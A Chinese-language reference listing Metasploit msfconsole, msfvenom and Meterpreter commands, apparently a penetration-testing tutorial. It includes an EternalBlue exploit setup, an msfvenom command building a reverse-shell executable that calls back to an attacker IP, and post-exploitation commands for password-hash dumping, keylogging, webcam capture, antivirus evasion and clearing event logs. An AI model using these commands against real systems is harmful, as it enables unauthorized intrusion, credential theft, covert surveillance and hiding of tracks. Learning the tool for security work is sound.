MSF(Metasploit Framework)的命令体系较为庞大,主要可以分为三个部分:msfconsole 控制台命令、msfvenom 载荷生成命令以及 Meterpreter 会话命令。
🖥️ msfconsole 控制台命令
这是在 Metasploit 框架主界面中使用的命令,用于查找、配置和执行攻击模块。
模块管理与执行
search: 搜索模块。可以根据名称、CVE编号、类型等关键词查找。- 示例:
search eternalblue或search cve:2024 type:exploit
- 示例:
use: 加载指定的模块。- 示例:
use exploit/windows/smb/ms17_010_eternalblue
- 示例:
info: 显示当前或指定模块的详细信息。show: 显示各类信息,常用子命令有:show options: 查看当前模块需要配置的参数(标有yes的为必填项)。show payloads: 查看当前模块支持的攻击载荷(Payload)。show targets: 查看当前模块支持的目标系统。show exploits: 查看所有渗透攻击模块。show auxiliary: 查看所有辅助模块。
set: 为模块参数赋值。- 示例:
set RHOSTS 192.168.1.100(设置目标IP) - 示例:
set LHOST 192.168.1.101(设置本地监听IP)
- 示例:
exploit/run: 执行当前加载的模块,两者功能相同。back: 退出当前模块,返回上一级菜单。exit/quit: 完全退出msfconsole。
会话管理
当攻击成功后,会使用会话(Session)命令来管理已获取的权限。
sessions: 查看所有活跃的会话列表。sessions -i <id>: 与指定ID的会话进行交互,例如进入 Meterpreter 命令行。sessions -k <id>: 终止指定ID的会话。background: 将当前会话置于后台运行,可以返回msfconsole主界面。
数据库操作
msfdb init: 初始化 Metasploit 的 PostgreSQL 数据库。db_status: 检查数据库连接状态。db_nmap: 调用 Nmap 进行扫描,并将结果自动存入数据库。hosts: 列出数据库中记录的所有主机。workspace: 管理工作区,用于隔离不同项目的数据。
🛠️ msfvenom 载荷生成命令
msfvenom 是一个独立的命令行工具,用于生成和编码 Payload(攻击载荷),例如可执行文件、脚本等。它不属于 msfconsole 内部命令。
-
基本语法 :
msfvenom -p <payload> <options> -f <format> -o <output_file> -
常用参数:
-p, --payload: 指定要使用的 Payload。-f, --format: 指定输出格式(如exe,elf,php等)。-o, --out: 指定输出文件的路径。-e, --encoder: 指定编码器,用于绕过杀毒软件。LHOST: 本地主机IP,即攻击者的IP。LPORT: 本地监听端口。
-
示例: 生成一个 Windows 系统的反向 TCP 连接 Payload。
bash
1msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o shell.exe
🎯 Meterpreter 会话命令
Meterpreter 是 MSF 功能最强大的 Payload 之一,成功连接后会进入一个交互式命令行环境,提供丰富的后渗透攻击功能。
系统操作
sysinfo: 获取目标系统的详细信息(操作系统、计算机名等)。getuid: 查看当前 Meterpreter 会话的运行用户权限。getsystem: 尝试将权限提升至 SYSTEM 级别(通常需要管理员权限)。ps: 列出目标系统上的所有进程。migrate <pid>: 将 Meterpreter 会话迁移到指定 PID 的进程中,以维持权限。shell: 切换到目标系统的原生命令行(如 Windows 的 cmd)。reboot/shutdown: 重启或关闭目标计算机。
文件系统操作
ls/pwd: 列出目录/显示当前路径。cd: 切换目录。download: 从目标机下载文件到攻击机。upload: 从攻击机上传文件到目标机。cat: 读取文件内容。rm/del: 删除文件。mkdir: 创建目录。
信息搜集与后渗透
-
hashdump: 转储 SAM 数据库,获取用户密码哈希值。 -
screenshot: 截取目标机当前桌面屏幕。 -
keyscan_start: 开始记录键盘击键。 -
keyscan_dump: 转储已记录的击键内容。 -
keyscan_stop: 停止键盘记录。 -
webcam_list: 列出目标机的摄像头。 -
webcam_snap: 使用摄像头拍照。 -
run: 执行 Meterpreter 脚本或后渗透模块,如run scraper(搜集信息)、run post/windows/manage/enable_rdp(开启远程桌面)。 -
clearev: 清除目标机的事件日志。00:42
一天一个网安技术,今天学习MSF远程控制手机

网络安全教学中心01:30
一分钟教你实现MSF远控手机(仅供网络安全技术学习)

网络安全-老白